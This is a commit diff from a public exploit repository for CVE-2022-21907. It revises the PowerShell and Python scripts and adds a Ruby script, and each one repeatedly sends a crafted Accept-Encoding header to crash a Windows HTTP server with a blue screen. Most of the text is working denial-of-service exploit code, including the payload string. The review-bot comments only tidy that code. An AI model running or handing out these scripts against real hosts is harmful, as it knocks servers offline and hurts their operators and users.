[1.0.0] Metasploit, NMAP modules and pure ruby script
 - Fix: some errors in the Python and PowerShell exploits
mauricelambert authored Mar 5, 2022
1 parent c4979f2 commit d6110d7
Showing 8 changed files with 671 additions and 24 deletions.
10 changes: 7 additions & 3 deletions CVE-2022-21907.ps1
@@ -1,4 +1,4 @@
###################
###################
# This script exploit the CVE-2022-21907 for a DOS (Denial of Service) attack (Blue Screen).
# Copyright (C) 2022 Maurice Lambert

Expand Down Expand Up @@ -30,7 +30,7 @@ This is free software, and you are welcome to redistribute it
under certain conditions.
"@

write $copyright
write "`n$copyright`n"

$session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
$session.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Edg/97.0.1072.62"
Expand All @@ -55,5 +55,9 @@ $headers = @{

$ErrorActionPreference="Stop"
while(1) {
Invoke-WebRequest -UseBasicParsing -Uri "http://$target/" -WebSession $session -Headers $headers
try {
Invoke-WebRequest -UseBasicParsing -Uri "http://$target/" -WebSession $session -Headers $headers -TimeoutSec 10
} catch {
break
}
}
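--- /dev/null
+++ b/CVE-2022-21907.rb
@@ -0,0 +1,161 @@
+#!/usr/bin/env ruby
+# frozen_string_literal: true
+
+##
+# This script exploit the CVE-2022-21907 for a DOS (Denial of Service)
+# attack (Blue Screen).
+
+###################
+# This script exploit the CVE-2022-21907 for a DOS attack.
+# Copyright (C) 2022 Maurice Lambert
+
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+
+# You should have received a copy of the GNU General Public License
+# along with this program. If not, see <https://www.gnu.org/licenses/>.
+###################
+
+##
+# Project version
+VERSION = '1.0.0'
+
+##
+# Project author
+AUTHOR = 'Maurice Lambert'
+
+##
+# E-mail of the author of the project
+AUTHOR_EMAIL = '[email protected]'
+
+##
+# Project maintainer
+MAINTAINER = 'Maurice Lambert'
+
+##
+# E-mail of the maintainer of the project
+MAINTAINER_EMAIL = '[email protected]'
+
+##
+# Project description
+DESCRIPTION = '
+This script exploit the CVE-2022-21907 for a DOS (Denial of Service)
+attack (Blue Screen).
+'
+
+##
+# Project license
+LICENSE = 'GPL-3.0 License'
+
+##
+# Project url
+URL = 'https://github.com/mauricelambert/CVE-2022-21907'
+
+##
+# Project copyright
+COPYRIGHT = '
+CVE-2022-21907 Copyright (C) 2022 Maurice Lambert
+This program comes with ABSOLUTELY NO WARRANTY.
+This is free software, and you are welcome to redistribute it
+under certain conditions.
+'
+
+puts "#{COPYRIGHT}\n"
+
+require 'net/http'
+
+##
+# This class implements methods to exploit
+# the CVE-2022-21907 for a DOS (Denial of Service)
+# attack (Blue Screen) with ruby.
+class CVE202221907
+##
+# This function gets target host from the STDIN
+
+def self.get_stdin_host
+print 'Host (target): '
+gets.strip
+end
+
+##
+# This function generates a random string
+
+def self.generate_random_string(size)
+upper_characters = Array('A'..'Z')
+Array.new(size) { upper_characters.sample }.join
+end
+
+##
+# This function generates a random payload
+
+def self.generate_encoding_payload
+"#{generate_random_string(24)},#{generate_random_string(60)}&" \
+"#{generate_random_string(2)}&**" \
+"#{generate_random_string(20)}**#{Array('A'..'Z').sample}," \
+"#{generate_random_string(73)},#{generate_random_string(71)}" \
+",#{generate_random_string(27)},****************************" \
+"#{generate_random_string(6)}, *, ,"
+end
+
+##
+# This function checks the target state
+
+def self.check_up(request, uri)
+res = Net::HTTP.start(
+uri.hostname, uri.port,
+read_timeout: 60,
+open_timeout: 60,
+use_ssl: uri.scheme == 'https'
+) { |http| http.request(request) }
+rescue Net::OpenTimeout, Errno::ETIMEDOUT, SocketError
+puts '[!] This host is probably inaccessible'
+2
+else
+nil
+end
+
+##
+# The main function to launch the attack
+
+def self.main
+host = ARGV[0] || get_stdin_host
+
+uri = URI("http://#{host}")
+request = Net::HTTP::Get.new(uri)
+
+access_error = check_up(request, uri)
+return access_error if access_error
+
+request['Accept-Encoding'] = generate_encoding_payload
+vulnerable = false
+
+10.times do
+Net::HTTP.start(
+uri.hostname, uri.port,
+read_timeout: 10,
+open_timeout: 10,
+use_ssl: uri.scheme == 'https'
+) { |http| http.request(request) }
+rescue Net::OpenTimeout, Errno::ETIMEDOUT
+vulnerable = true
+break
+end
+
+if vulnerable
+puts "[+] Target: #{host} is vulnerable and down."
+0
+else
+puts "[-] Target: #{host} is not vulnerable and up."
+1
+end
+end
+end
+
+exit(CVE202221907.main) if __FILE__ == $PROGRAM_NAME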
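Review bot: The banner `puts "#{COPYRIGHT}\n"` and the `require 'net/http'` are file-level statements outside the `if __FILE__ == $PROGRAM_NAME` guard, so the copyright text is printed as a load-time side effect whenever this file is required rather than run, and the require comes after executable code; move `require 'net/http'` under the `frozen_string_literal` line and the `puts` into `self.main`. In `self.check_up` the local `res` is assigned but never read, so `Net::HTTP.start(...) { |http| http.request(request) }` can stand on its own. `self.get_stdin_host` calls `gets.strip`, which raises `NoMethodError` instead of a clear message when stdin is at EOF (`gets` returns `nil`); `gets&.strip` with an explicit check would fail cleanly. Each `##` doc block is separated from its `def` by a blank line, which detaches it from the method for RDoc/YARD, and "This function" should read "This method" since these are class methods.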
37 changes: 21 additions & 16 deletions CVE202221907.py
Expand Up @@ -51,35 +51,40 @@

print(copyright)

from urllib.error import URLError, HTTPError
from urllib.request import Request, urlopen
from sys import exit, stderr
from sys import exit, stderr, argv
from socket import timeout

host = input("Target: ")
host = argv[1] if len(argv) == 2 else input("Target: ")

headers = {
"Accept-Encoding": 'AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,'
"Accept-Encoding": "AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,"
}

try:
response = urlopen(f"http://{host}")
except (URLError, HTTPError) as e:
urlopen(f"http://{host}")
except HTTPError:
pass
except Exception as e:
print(f"http://{host} is not DOWN.")
print(f"{e.__class__}: {e}", file = stderr)
print(f"[!] http://{host} is not UP (get no response).")
print(f"{e.__class__.__name__}: {e}", file=stderr)
exit(1)

print(f"http://{host} is not UP. Start hacking...")
print(f"[+] http://{host} is UP. Send payload...")

while True:
try:
response = urlopen(Request(f"http://{host}", headers=headers))
except TimeoutError as e:
print(f"http://{host} is not DOWN. {host} is vulnerable to CVE-2022-21907.")
exit(0)
except (URLError, HTTPError) as e:
pass
urlopen(Request(f"http://{host}", headers=headers))
except (timeout, TimeoutError, URLError):
print(
f"[+] http://{host} is DOWN. {host} is vulnerable to CVE-2022-21907."
)
exit(0)
except HTTPError:
pass
except Exception as e:
print(f"{e.__class__}: {e}")
print(f"{e.__class__.__name__}: {e}", file=stderr)

print(f"Payload sent successfully. Try new request...")
print("[!] Host is up.", file=stderr)
print("[+] Payload sent successfully. Try new request...")
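Review bot: `host = argv[1] if len(argv) == 2 else input("Target: ")` silently ignores the command line when more than one argument is given and drops into the interactive prompt, which is surprising in scripted use; `host = argv[1] if len(argv) > 1 else input("Target: ")`, or an explicit usage message such as `print(f"Usage: {argv[0]} [host]", file=stderr); exit(2)` for any other argument count, is clearer. The new `except (timeout, TimeoutError, URLError)` lists `socket.timeout` next to `TimeoutError`; on Python 3.10+ `socket.timeout` is an alias of `TimeoutError`, so a short comment like `# socket.timeout kept for Python < 3.10` would explain why both are named. The hunk starts mid-file after the banner, and the `while True` loop has no bound, so a `KeyboardInterrupt` is the only way out when the target keeps answering; a comment stating that is intended would help the next reader.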
